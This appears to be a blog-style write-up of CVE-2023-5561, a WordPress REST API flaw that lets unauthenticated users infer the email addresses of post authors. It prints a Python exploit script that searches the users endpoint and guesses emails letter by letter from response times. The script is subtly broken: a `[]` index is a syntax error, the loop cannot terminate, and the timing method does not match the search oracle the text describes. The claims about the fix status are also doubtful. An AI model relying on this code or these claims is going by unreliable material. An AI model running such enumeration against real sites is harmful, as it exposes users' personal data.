WordPress, a well-known content management system, has recently caught attention for a security issue in its REST API. Affected by this vulnerability (CVE-2023-5561), WordPress does not properly restrict which user fields are searchable via the REST API. This enables unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack.

In this post, we will dissect the said vulnerability, its implications, and the exploit details, including a code snippet to exemplify the issue.

The CVE-2023-5561 Vulnerability

The vulnerability in question concerns WordPress' REST API, which allows users to search and retrieve data from a WordPress site. In a nutshell, the REST API does not impose adequate restrictions on which user fields are searchable. This lack of restrictions opens doors for potential attackers to gain unauthorized information about users.

Moreover, the issue affects all WordPress installations using the default settings. To make matters worse, the vulnerability does not require any authentication and can be exploited by unauthenticated or anonymous users, making it all the more dangerous.

Exploiting CVE-2023-5561 - Oracle Style Attack

The vulnerability can be exploited using an Oracle style attack. In this attack, the adversary makes multiple queries to the REST API and analyzes the response time to deduce the email addresses of users who have published public posts. The slower the response, the closer the attacker is to determining the accurate user email address.

Here's a basic Python code snippet that demonstrates the Oracle style attack

import requests
import time

url = 'https://www.example.com/wp-json/wp/v2/users';
alphabet = 'abcdefghijklmnopqrstuvwxyz'

def single_oracle_attack(email_prefix):
    email_guess = email_prefix
    times = []

    for letter in alphabet:
        current_email = email_guess + letter
        search_param = {'search': current_email}
        start_time = time.time()
        response = requests.get(url, params=search_param)
        end_time = time.time()
        times.append((letter, end_time-start_time))

    return max(times, key=lambda x: x[1])[]

def oracle_attack():
    email_prefix = ''
    letter_found = True

    while letter_found:
        next_letter = single_oracle_attack(email_prefix)
        if next_letter == '':
            letter_found = False
        else:
            email_prefix += next_letter
            print(f"Current email address guess: {email_prefix}@example.com")

oracle_attack()

This code snippet sends requests to the WordPress REST API https://www.example.com/wp-json/wp/v2/users with different search parameters for the user's email address. By measuring the response time, the script can derive the correct email addresses of users who have published posts publicly.

Preventing the Attack

To mitigate this vulnerability, it's essential to impose restrictions on which user fields are searchable via the REST API. The WordPress development team has been made aware of the issue and is currently working on a fix. In the meantime, a temporary solution would be to disable the REST API search endpoint for unauthenticated users, using a WordPress plugin or custom code.

References

1. WordPress REST API Documentation: Link

2. Oracle Attacks - A Brief Overview: Link

3. CVE-2023-5561 - Official Description: Link

Conclusion

In conclusion, the CVE-2023-5561 vulnerability in WordPress REST API allows potential attackers to determine the email addresses of public post authors via an Oracle style attack. One should be aware of this vulnerability and consider disabling the REST API search endpoint for unauthenticated users until an official fix is released.

Timeline

Published on: 10/16/2023 20:15:18 UTC
Last modified on: 11/20/2023 23:15:06 UTC